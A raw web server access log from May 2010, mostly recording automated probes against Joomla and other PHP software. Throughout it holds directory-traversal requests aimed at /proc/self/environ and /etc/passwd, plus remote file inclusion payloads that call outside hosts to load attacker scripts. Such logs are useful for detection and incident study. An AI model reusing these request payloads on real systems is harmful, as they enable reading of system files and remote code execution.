69.73.180.30 - - [23/May/2010:23:48:15 -0500] "GET /logs/index2.php?option=com_juser&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
64.27.53.238 - - [23/May/2010:23:48:52 -0500] "GET //administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 351 "-""Mozilla/5.0"
64.27.53.238 - - [23/May/2010:23:48:52 -0500] "GET /logs//administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 356 "-""Mozilla/5.0"
64.27.53.238 - - [23/May/2010:23:48:52 -0500] "GET /logs/access_log.1271548800//administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 378 "-""Mozilla/5.0"
81.21.79.214 - - [23/May/2010:23:49:07 -0500] "GET /index2.php?option=com_juser&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
93.114.41.16 - - [23/May/2010:23:49:44 -0500] "GET /logs/access_log.1273363200//index2.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.834"
188.40.180.251 - - [23/May/2010:23:50:30 -0500] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
81.21.79.214 - - [23/May/2010:23:50:43 -0500] "GET /logs/access_log.1271894400/index2.php?option=com_juser&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
81.21.79.214 - - [23/May/2010:23:50:43 -0500] "GET /index2.php?option=com_juser&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
81.21.79.214 - - [23/May/2010:23:50:43 -0500] "GET /logs/index2.php?option=com_juser&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
87.250.255.243 - - [23/May/2010:23:51:25 -0500] "GET /tattoo/set4.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.183 - - [23/May/2010:23:51:42 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
81.21.79.214 - - [23/May/2010:23:53:57 -0500] "GET /logs/access_log.1208995200/index2.php?option=com_juser&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
211.115.111.115 - - [23/May/2010:23:54:59 -0500] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 200 6786 "-""Mozilla/5.0"
211.115.111.115 - - [23/May/2010:23:54:59 -0500] "GET /logs/access_log.1270857600//?_SERVER%5BDOCUMENT_ROOT%5D=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
211.115.111.115 - - [23/May/2010:23:54:59 -0500] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
81.21.79.214 - - [23/May/2010:23:58:09 -0500] "GET /index2.php?option=com_juser&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
173.203.115.77 - - [23/May/2010:23:58:35 -0500] "GET /index2.php?option=com_juser&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
173.203.115.77 - - [23/May/2010:23:58:49 -0500] "GET /index2.php?option=com_juser&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
82.103.136.15 - - [23/May/2010:23:59:44 -0500] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
82.103.136.15 - - [23/May/2010:23:59:45 -0500] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
87.250.255.243 - - [24/May/2010:00:00:31 -0500] "GET /logs/access_log.1156896000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
69.73.180.30 - - [24/May/2010:00:01:04 -0500] "GET /logs/access_log.1208995200/index2.php?option=com_juser&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
173.203.115.77 - - [24/May/2010:00:01:23 -0500] "GET /logs/index2.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
173.203.115.77 - - [24/May/2010:00:01:23 -0500] "GET /index2.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
209.126.254.139 - - [24/May/2010:00:01:24 -0500] "GET //inc/download_center_lite.inc.php?script_root=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 404 317 "-""Mozilla/5.0"
209.126.254.139 - - [24/May/2010:00:01:24 -0500] "GET /logs/access_log.1271376000//inc/download_center_lite.inc.php?script_root=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 404 344 "-""Mozilla/5.0"
209.126.254.139 - - [24/May/2010:00:01:24 -0500] "GET /logs//inc/download_center_lite.inc.php?script_root=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 404 322 "-""Mozilla/5.0"
209.126.254.139 - - [24/May/2010:00:01:24 -0500] "GET /logs/access_log.1271894400//inc/download_center_lite.inc.php?script_root=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 404 344 "-""Mozilla/5.0"
188.40.165.225 - - [24/May/2010:00:02:36 -0500] "GET /logs/?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6781 "-""libwww-perl/5.833"
188.40.165.225 - - [24/May/2010:00:02:37 -0500] "GET /?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.833"
81.21.79.214 - - [24/May/2010:00:09:11 -0500] "GET /logs/access_log.1271894400/index2.php?option=com_juser&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
81.21.79.214 - - [24/May/2010:00:09:11 -0500] "GET /index2.php?option=com_juser&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
81.21.79.214 - - [24/May/2010:00:09:11 -0500] "GET /logs/index2.php?option=com_juser&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
87.250.255.243 - - [24/May/2010:00:09:14 -0500] "GET /logs/access_log.1171065600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
66.249.65.46 - - [24/May/2010:00:09:53 -0500] "GET /costume/036_JPG%20copy.jpg HTTP/1.1" 304 - "-""Googlebot-Image/1.0"
89.163.148.130 - - [24/May/2010:00:10:33 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-"""
89.163.148.130 - - [24/May/2010:00:10:33 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-"""
89.163.148.130 - - [24/May/2010:00:11:22 -0500] "GET /logs/index.php?option=com_webtv&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-"""
89.163.148.130 - - [24/May/2010:00:11:22 -0500] "GET /index.php?option=com_webtv&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-"""
89.163.148.130 - - [24/May/2010:00:12:13 -0500] "GET /logs/index.php?option=com_powermail&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-"""
89.163.148.130 - - [24/May/2010:00:12:14 -0500] "GET /index.php?option=com_powermail&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-"""
81.21.79.214 - - [24/May/2010:00:12:42 -0500] "GET /logs/access_log.1208995200/index2.php?option=com_juser&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
84.40.30.37 - - [24/May/2010:00:12:45 -0500] "GET /logs/skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:00:12:45 -0500] "GET /skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 308 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:00:12:45 -0500] "GET /logs/access_log.1262822400/skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:00:12:46 -0500] "GET /logs/skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:00:12:46 -0500] "GET /skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 308 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:00:12:46 -0500] "GET /logs/access_log.1262822400/skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0"
89.163.148.130 - - [24/May/2010:00:13:04 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-"""
89.163.148.130 - - [24/May/2010:00:13:04 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-"""
89.163.148.130 - - [24/May/2010:00:14:48 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-"""
84.40.30.37 - - [24/May/2010:00:15:34 -0500] "GET /logs/skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:00:15:34 -0500] "GET /skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 308 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:00:15:35 -0500] "GET /logs/access_log.1271548800/skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:00:15:35 -0500] "GET /skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 308 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:00:15:36 -0500] "GET /logs/skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:00:15:36 -0500] "GET /logs/access_log.1271548800/skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0"
87.250.255.243 - - [24/May/2010:00:16:07 -0500] "GET /tattoo HTTP/1.1" 301 330 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [24/May/2010:00:16:09 -0500] "GET /tattoo/ HTTP/1.1" 200 466 "-""Yandex/1.01.001 (compatible; Win16; I)"
81.21.79.214 - - [24/May/2010:00:18:14 -0500] "GET /logs/access_log.1271894400/index2.php?option=com_juser&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
81.21.79.214 - - [24/May/2010:00:18:14 -0500] "GET /index2.php?option=com_juser&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
81.21.79.214 - - [24/May/2010:00:18:14 -0500] "GET /logs/index2.php?option=com_juser&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
87.250.255.243 - - [24/May/2010:00:19:19 -0500] "GET /logs/access_log.1256947200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
173.203.115.77 - - [24/May/2010:00:19:24 -0500] "GET /logs/access_log.1271894400/index2.php?option=com_juser&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
173.203.115.77 - - [24/May/2010:00:19:24 -0500] "GET /index2.php?option=com_juser&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
173.203.115.77 - - [24/May/2010:00:19:24 -0500] "GET /logs/index2.php?option=com_juser&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
174.120.226.212 - - [24/May/2010:00:19:37 -0500] "GET /logs///index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""libwww-perl/5.831"
174.120.226.212 - - [24/May/2010:00:19:38 -0500] "GET ///index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""libwww-perl/5.831"
173.203.115.77 - - [24/May/2010:00:20:01 -0500] "GET /logs/access_log.1271894400/index2.php?option=com_juser&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
173.203.115.77 - - [24/May/2010:00:20:01 -0500] "GET /index2.php?option=com_juser&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
173.203.115.77 - - [24/May/2010:00:20:01 -0500] "GET /logs/index2.php?option=com_juser&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
81.21.79.214 - - [24/May/2010:00:21:29 -0500] "GET /logs/access_log.1208995200/index2.php?option=com_juser&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
87.119.196.31 - - [24/May/2010:00:23:53 -0500] "GET /logs/http://localhost/[path]/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.803"
87.119.196.31 - - [24/May/2010:00:23:53 -0500] "GET /logs/http://localhost/[path]/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.803"
87.119.196.31 - - [24/May/2010:00:23:53 -0500] "GET /http://localhost/[path]/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.803"
87.119.196.31 - - [24/May/2010:00:23:53 -0500] "GET /http://localhost/[path]/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.803"
84.40.30.37 - - [24/May/2010:00:23:59 -0500] "GET /skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 308 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:00:23:59 -0500] "GET /logs/skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:00:24:00 -0500] "GET /logs/access_log.1271548800/skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:00:24:01 -0500] "GET /logs/access_log.1271548800/skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:00:24:03 -0500] "GET /skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 308 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:00:24:03 -0500] "GET /logs/skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:00:24:07 -0500] "GET /logs/skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:00:24:12 -0500] "GET /logs/access_log.1271548800/skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:00:24:12 -0500] "GET /skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 308 "-""Mozilla/5.0"
87.119.196.31 - - [24/May/2010:00:24:24 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
87.119.196.31 - - [24/May/2010:00:24:25 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
87.119.196.31 - - [24/May/2010:00:24:35 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
87.119.196.31 - - [24/May/2010:00:24:35 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.60.216 - - [24/May/2010:00:24:39 -0500] "GET /logs/http://localhost/[path]/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.803"
94.23.60.216 - - [24/May/2010:00:24:40 -0500] "GET /http://localhost/[path]/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.803"
207.46.195.234 - - [24/May/2010:00:25:02 -0500] "GET /logs/access_log.1253836800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
64.71.32.29 - - [24/May/2010:00:25:03 -0500] "GET /logs//projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 330 "-""libwww-perl/5.813"
64.71.32.29 - - [24/May/2010:00:25:06 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.813"
64.71.32.29 - - [24/May/2010:00:25:13 -0500] "GET /logs//projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 330 "-""libwww-perl/5.813"
64.71.32.29 - - [24/May/2010:00:25:13 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.813"
94.23.60.216 - - [24/May/2010:00:25:16 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.60.216 - - [24/May/2010:00:25:16 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
64.71.32.29 - - [24/May/2010:00:25:17 -0500] "GET /logs//projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 330 "-""libwww-perl/5.813"
64.71.32.29 - - [24/May/2010:00:25:17 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.813"
64.71.32.29 - - [24/May/2010:00:25:17 -0500] "GET /logs//projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 330 "-""libwww-perl/5.813"
64.71.32.29 - - [24/May/2010:00:25:17 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.813"
64.71.32.29 - - [24/May/2010:00:25:18 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.813"
64.71.32.29 - - [24/May/2010:00:25:19 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.813"
64.71.32.29 - - [24/May/2010:00:25:20 -0500] "GET /logs//projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 330 "-""libwww-perl/5.813"
64.71.32.29 - - [24/May/2010:00:25:20 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.813"
64.71.32.29 - - [24/May/2010:00:25:25 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.813"
64.71.32.29 - - [24/May/2010:00:25:29 -0500] "GET /logs//projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 330 "-""libwww-perl/5.813"
64.71.32.29 - - [24/May/2010:00:25:29 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.813"
64.71.32.29 - - [24/May/2010:00:25:29 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.813"
89.163.148.130 - - [24/May/2010:00:25:31 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-"""
89.163.148.130 - - [24/May/2010:00:25:31 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-"""
89.163.148.130 - - [24/May/2010:00:25:31 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-"""
64.71.32.29 - - [24/May/2010:00:25:32 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.813"
64.71.32.29 - - [24/May/2010:00:25:33 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.813"
64.71.32.29 - - [24/May/2010:00:25:34 -0500] "GET /logs//projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 330 "-""libwww-perl/5.813"
64.71.32.29 - - [24/May/2010:00:25:34 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.813"
64.71.32.29 - - [24/May/2010:00:25:36 -0500] "GET /logs//projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 330 "-""libwww-perl/5.813"
64.71.32.29 - - [24/May/2010:00:25:36 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.813"
